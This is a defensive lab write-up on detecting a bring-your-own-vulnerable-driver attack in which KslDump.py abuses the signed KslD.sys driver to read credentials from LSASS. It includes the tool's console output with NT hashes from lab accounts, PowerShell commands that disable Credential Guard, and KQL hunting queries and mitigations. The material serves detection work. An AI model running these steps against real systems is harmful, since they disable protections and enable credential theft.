
BYOVD and KslD.sys

How do I use this?

Click the "Copy init KQL" link. This copies a large block of KQL to the clipboard that creates the required tables, ASIM parsers and helper functions, and starts ingestion of the telemetry. A new window will also open to Azure Data Explorer. Create a free cluster and a database (and a Microsoft account if you don't have one), then paste the clipboard contents into the query window and click Run. The bootstrap process takes about a minute. If you have an existing ADX cluster with data in it, keep in mind that the bootstrap process wipes any functions and tables whose names match the ones it creates, and many of those are common table names. Create a separate database if you're concerned about data loss.

The "Copy init KQL" functionality depends on JavaScript. If it isn't enabled, the link will open a new window to GitHub where you can select all and copy the KQL. Then visit Azure Data Explorer to paste and run the bootstrap query. There are links under the Actions heading on the right for convenience.

Synopsis

This is a small lab, even compared with the other small labs in the library that will be released shortly. The goal is to give you real telemetry to look around in and see what you can find (there is not much). The whole lab consists of a single KslDump.py execution, which abuses a vulnerable Microsoft-signed driver for credential theft. You're advised to review the entire README.md for KslDump.py before proceeding. It's not a long read!

Some caveats:

  • Download and file creation events for the driver and script pre-date the available telemetry.
  • I brought the driver because my machine was on 22H2 and didn't have it. I had trouble forcing it to update to 25H2, so I downloaded it from an Azure VM on Windows 11 25H2. I copied it to C:\Windows\System32\drivers, but it wasn't necessary to do that. I could have left it in the user profile Downloads folder and modified the script to use it there. While the driver is currently present on 25H2, this may not be true in the future.

Random notes:

  • There are Zeek and Suricata logs, but they're useless. I should have removed them but did not in my rush to publication.

The attack

I ran the following using elevated privileges. Jump to the analysis.

C:\Users\domainuser\Downloads\KslDump-main\KslDump-main>C:\Users\domainuser\AppData\Local\Programs\Python\Python314\python.exe ksldump.py
[*] Windows Build 22621
[*] Setting up KslD...
[*] KASLR bypass (SubCmd 2)...
  ntoskrnl=0xfffff8040ca00000
[*] Finding lsass.exe...
  lsass.exe PID=1100 DTB=0x7b5a0a002
[*] Finding lsasrv.dll...
  lsasrv.dll base=0x7ffb79bf0000 size=0x1a3000
[*] Extracting LSA keys...
  LSA keys found
[*] Finding LogonSessionList...
[*] Restoring registry...
[-] FATAL: LogonSessionList not found
Traceback (most recent call last):
  File "C:\Users\domainuser\Downloads\KslDump-main\KslDump-main\ksldump.py", line 525, in <module>
    main()
    ~~~~^^
  File "C:\Users\domainuser\Downloads\KslDump-main\KslDump-main\ksldump.py", line 495, in main
    list_ptr, count = find_logon_list(handle, dtb, base, size, build)
                      ~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\domainuser\Downloads\KslDump-main\KslDump-main\ksldump.py", line 404, in find_logon_list
    raise Exception("LogonSessionList not found")
Exception: LogonSessionList not found

I ran into issues with incorrect offsets during execution of KslDump.py, probably because the author didn't anticipate execution on this build. I recalculated the offsets with some help using Ghidra and submitted a PR.

C:\Users\domainuser\Downloads\KslDump-main\KslDump-main>C:\Users\domainuser\AppData\Local\Programs\Python\Python314\python.exe ksldump.py
[*] Windows Build 22621
[*] Setting up KslD...
[*] KASLR bypass (SubCmd 2)...
  ntoskrnl=0xfffff8040ca00000
[*] Finding lsass.exe...
  lsass.exe PID=1100 DTB=0x7b5a0a002
[*] Finding lsasrv.dll...
  lsasrv.dll base=0x7ffb79bf0000 size=0x1a3000
[*] Extracting LSA keys...
  LSA keys found
[*] Finding LogonSessionList...
[*] Extracting credentials...

============================================================
[-] No credentials extracted (Credential Guard may be active)
[*] Restoring registry...

Also, Credential Guard was running, so I disabled it:

New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\DeviceGuard" -Force
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\DeviceGuard" -Name "EnableVirtualizationBasedSecurity" -Value 0
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\DeviceGuard" -Name "LsaCfgFlags" -Value 0
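From the defender's side, the policy changes above leave a trail in registry telemetry. The following is an added example (not part of the original post or the KslDump project) of a query over the Defender advanced hunting DeviceRegistryEvents table that surfaces the two DeviceGuard policy values being set to 0, together with the process that set them. It assumes the DeviceRegistryEvents schema and ActionType names as documented for Microsoft Defender XDR; the author notes that this lab's telemetry only covers the KslDump.py run, so this step will not appear in the lab data.

```kql
// Added example: surface VBS / Credential Guard policy values being turned off.
// Key path and value names are the ones used in the post; table and column
// names follow the Microsoft Defender XDR advanced hunting schema (assumption:
// the lab bootstrap uses the same schema).
let DeviceGuardPolicyKey = @"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\DeviceGuard";
let WatchedValues = dynamic(["EnableVirtualizationBasedSecurity", "LsaCfgFlags"]);
DeviceRegistryEvents
| where ActionType == "RegistryValueSet"
| where RegistryKey =~ DeviceGuardPolicyKey
| where RegistryValueName in~ (WatchedValues)
| where RegistryValueData == "0"
// Keep the previous value so a transition from enabled (1) to disabled (0) is visible.
| project Timestamp, DeviceName, RegistryValueName, PreviousRegistryValueData, RegistryValueData,
    InitiatingProcessAccountName, InitiatingProcessFileName, InitiatingProcessCommandLine,
    InitiatingProcessParentFileName
| order by Timestamp asc
```

Management tooling and Group Policy can legitimately write these values, so the initiating process fields are what you triage on: a PowerShell or reg.exe session run interactively by an elevated user, as in the post, looks very different from the policy engine applying a GPO. Because Credential Guard stays active until the next reboot, a hit here is an early warning that arrives before any credential extraction can succeed.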

After a reboot, I gave it another try:

C:\Users\domainuser\Downloads\KslDump-main\KslDump-main>C:\Users\domainuser\AppData\Local\Programs\Python\Python314\python.exe ksldump.py
[*] Windows Build 22621
[*] Setting up KslD...
[*] KASLR bypass (SubCmd 2)...
  ntoskrnl=0xfffff8027b400000
[*] Finding lsass.exe...
  lsass.exe PID=1108 DTB=0x7a054b002
[*] Finding lsasrv.dll...
  lsasrv.dll base=0x7ff986610000 size=0x1a3000
[*] Extracting LSA keys...
  LSA keys found
[*] Finding LogonSessionList...
[*] Extracting credentials...

============================================================
[+] 9 credential(s) extracted:

  ludus\domainadmin
    NT:   000000008846f7eaee8fb117ad06bdd8

  Window Manager\DWM-3
    NT:   52a72f764deaec8edc3f61b92122b268

  Font Driver Host\UMFD-3
    NT:   52a72f764deaec8edc3f61b92122b268

  ludus\domainuser
    NT:   000000008846f7eaee8fb117ad06bdd8

  NT VIRTUAL MACHINE\C801C19E-5CEC-4979-B3FF-009B83521EE9
    NT:   52a72f764deaec8edc3f61b92122b268

  Window Manager\DWM-1
    NT:   52a72f764deaec8edc3f61b92122b268

  ludus\JD-WIN11-22H2-1$
    NT:   52a72f764deaec8edc3f61b92122b268

  Font Driver Host\UMFD-0
    NT:   52a72f764deaec8edc3f61b92122b268

  Font Driver Host\UMFD-1
    NT:   52a72f764deaec8edc3f61b92122b268

[*] Restoring registry...

Analysis

The logs only cover successful execution for KslDump.py. There's no additional sequence where credentials are abused.

DeviceEvents
| where ActionType == "DriverLoad"
| project
  Timestamp, DeviceName, FileName, FolderPath, SHA256
Timestamp                    | DeviceName                   | FileName | FolderPath                                                            | SHA256
2026-03-23T23:35:40.7144930Z | jd-win11-22h2-1.ludus.domain | KslD.sys | C:\Windows\System32\drivers                                           | bd17231833aa369b3b2b6963899bf05dbefd673db270aec15446f2fab4a17b5a
2026-03-23T23:35:40.7144938Z | jd-win11-22h2-1.ludus.domain | KslD.sys | C:\Windows\System32\drivers                                           | bd17231833aa369b3b2b6963899bf05dbefd673db270aec15446f2fab4a17b5a
2026-03-23T23:35:45.1581080Z | jd-win11-22h2-1.ludus.domain | ksld.sys | C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.26010.5-0\Drivers | 224fec726efabd577f58573dee38da401c5caa316725afd5f6db3d81cddc9686
2026-03-23T23:35:45.1581083Z | jd-win11-22h2-1.ludus.domain | ksld.sys | C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.26010.5-0\Drivers | 224fec726efabd577f58573dee38da401c5caa316725afd5f6db3d81cddc9686

The vulnerable driver is the copy in C:\Windows\System32\drivers, with the SHA256 hash bd17231833aa369b3b2b6963899bf05dbefd673db270aec15446f2fab4a17b5a. The two later events are a different ksld.sys (SHA256 224fec726efabd577f58573dee38da401c5caa316725afd5f6db3d81cddc9686) loaded from the Defender Platform folder.

Detections and mitigations

What can we do about this? Audit the environment to make sure this driver isn't present; update devices that have it, then delete it; and block the file hash bd17231833aa369b3b2b6963899bf05dbefd673db270aec15446f2fab4a17b5a with WDAC so it can no longer be loaded. We can also write queries to hunt for it being loaded when it should not have been, and add the file hash in the Defender portal (or your preferred EDR) so that it is quarantined on creation or download. You will, of course, want to be careful how you do the latter to avoid accidentally breaking Defender.
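As an added example (not from the original post or the KslDump project), here is a hunting query over the same DeviceEvents table used in the analysis above. It flags DriverLoad events for KslD.sys whose SHA256 matches the hash identified in this post, and separately surfaces any load of a file by that name from somewhere other than the Defender Platform folder. The hash list is taken from this post; treating the Defender Platform folder as the only expected location is an assumption of the example, so the second condition is a review signal rather than a verdict.

```kql
// Added example: hunt for KslD.sys driver loads in DeviceEvents telemetry.
// The hash is the one identified in this post; the expected-folder prefix is an
// assumption and should be adjusted to what is normal in your environment.
let KnownVulnerableKslDHashes = dynamic([
    "bd17231833aa369b3b2b6963899bf05dbefd673db270aec15446f2fab4a17b5a"
]);
let ExpectedKslDFolderPrefix = @"C:\ProgramData\Microsoft\Windows Defender\Platform\";
DeviceEvents
| where ActionType == "DriverLoad"
| where FileName =~ "KslD.sys"
| extend KnownVulnerableHash = SHA256 in~ (KnownVulnerableKslDHashes)
| extend OutsideExpectedFolder = not(FolderPath startswith ExpectedKslDFolderPrefix)
| where KnownVulnerableHash or OutsideExpectedFolder
// Collapse duplicate load events (the lab shows pairs a few microseconds apart).
| summarize FirstLoad = min(Timestamp), LastLoad = max(Timestamp), Loads = count()
    by DeviceName, FileName, FolderPath, SHA256, KnownVulnerableHash, OutsideExpectedFolder
| extend Reason = case(
    KnownVulnerableHash, "Known vulnerable KslD.sys hash",
    OutsideExpectedFolder, "KslD.sys loaded from an unexpected folder (review)",
    "n/a")
| project FirstLoad, LastLoad, Loads, DeviceName, FolderPath, SHA256, Reason
| order by FirstLoad asc
```

Against this lab's data the two loads from C:\Windows\System32\drivers match on the hash and are collapsed into one row; the two loads from the Defender Platform folder carry a different hash and are not flagged by this query. Matching on the hash catches this exact file regardless of where it is placed or what it is renamed to, while the folder condition is what would still fire if a different build of the driver were dropped into a user-writable path, which is why both are kept.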

Why train on non-vulnerabilities like Bring Your Own Vulnerable Driver (BYOVD)? If you read Andrea's Responsible Disclosure section, you'll see Microsoft's finding that this is not a vulnerability. Whether we agree or not, BYOVD techniques evade monitoring that defenders rely on for visibility. Cached domain credentials in LSASS provide a bridge for lateral movement and potential domain compromise. Understanding these detection blind spots helps defenders find coverage gaps and implement controls.

References

Huntress - They Got In Through SonicWall. Then They Tried to Kill Every Security Tool
Fortinet - Massive Winos 4.0 Campaigns Target Taiwan
SentinelOne - Cybercrime Gang Enhances Ops with New EDR Bypasses and Automated Attacks
http://github.com/andreisss/KslDump